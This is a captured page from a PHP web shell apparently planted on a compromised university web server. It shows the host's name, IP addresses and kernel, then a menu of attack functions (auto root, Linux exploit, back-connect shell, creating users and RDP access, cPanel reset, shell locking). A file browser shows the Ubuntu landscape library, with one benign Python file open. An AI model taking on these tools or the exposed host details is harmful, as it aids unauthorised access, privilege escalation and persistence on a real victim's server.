Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.218.98.111
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
landscape /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
apt
[ DIR ]
drwxr-xr-x
__init__.py
198
B
-rw-r--r--
amp.py
21.24
KB
-rw-r--r--
backoff.py
1.64
KB
-rw-r--r--
base64.py
196
B
-rw-r--r--
bootstrap.py
1.38
KB
-rw-r--r--
bpickle.py
6.32
KB
-rw-r--r--
cli.py
440
B
-rw-r--r--
cloud.py
1.67
KB
-rw-r--r--
compat.py
616
B
-rw-r--r--
config.py
12.19
KB
-rw-r--r--
disk.py
4.91
KB
-rw-r--r--
encoding.py
545
B
-rw-r--r--
fd.py
751
B
-rw-r--r--
fetch.py
6.49
KB
-rw-r--r--
format.py
959
B
-rw-r--r--
fs.py
3.8
KB
-rw-r--r--
gpg.py
1.75
KB
-rw-r--r--
hashlib.py
264
B
-rw-r--r--
jiffies.py
1.58
KB
-rw-r--r--
juju.py
860
B
-rw-r--r--
lock.py
705
B
-rw-r--r--
log.py
484
B
-rw-r--r--
logging.py
2.47
KB
-rw-r--r--
lsb_release.py
1.82
KB
-rw-r--r--
message.py
2.58
KB
-rw-r--r--
monitor.py
6.13
KB
-rw-r--r--
network.py
9.54
KB
-rw-r--r--
persist.py
20.5
KB
-rw-r--r--
plugin.py
1.75
KB
-rw-r--r--
process.py
6.45
KB
-rw-r--r--
reactor.py
8.61
KB
-rw-r--r--
schema.py
6.31
KB
-rw-r--r--
scriptcontent.py
522
B
-rw-r--r--
sequenceranges.py
5.59
KB
-rw-r--r--
store.py
1.38
KB
-rw-r--r--
sysstats.py
7.73
KB
-rw-r--r--
tag.py
506
B
-rw-r--r--
testing.py
24.08
KB
-rw-r--r--
timestamp.py
233
B
-rw-r--r--
twisted_util.py
4.37
KB
-rw-r--r--
user.py
1.44
KB
-rw-r--r--
versioning.py
1.24
KB
-rw-r--r--
vm_info.py
3.1
KB
-rw-r--r--
warning.py
394
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lsb_release.py
"""Get information from /usr/bin/lsb_release.""" import os from subprocess import CalledProcessError, check_output LSB_RELEASE = "/usr/bin/lsb_release" LSB_RELEASE_FILENAME = "/etc/lsb_release" LSB_RELEASE_FILE_KEYS = { "DISTRIB_ID": "distributor-id", "DISTRIB_DESCRIPTION": "description", "DISTRIB_RELEASE": "release", "DISTRIB_CODENAME": "code-name", } def parse_lsb_release(lsb_release_filename=None): """ Returns a C{dict} holding information about the system LSB release. Reads from C{lsb_release_filename} if it exists, else calls C{LSB_RELEASE} """ if lsb_release_filename and os.path.exists(lsb_release_filename): return parse_lsb_release_file(lsb_release_filename) with open(os.devnull, 'w') as FNULL: try: lsb_info = check_output([LSB_RELEASE, "-as"], stderr=FNULL) except (CalledProcessError, FileNotFoundError): # Fall back to reading file, even if it doesn't exist. return parse_lsb_release_file(lsb_release_filename) else: dist, desc, release, code_name, _ = lsb_info.decode().split("\n") return { "distributor-id": dist, "release": release, "code-name": code_name, "description": desc, } def parse_lsb_release_file(filename): """ Returns a C{dict} holding information about the system LSB release by attempting to parse C{filename}. @raises: A FileNotFoundError if C{filename} does not exist. """ info = {} with open(filename) as fd: for line in fd: key, value = line.split("=") if key in LSB_RELEASE_FILE_KEYS: key = LSB_RELEASE_FILE_KEYS[key.strip()] value = value.strip().strip('"') info[key] = value return info
Close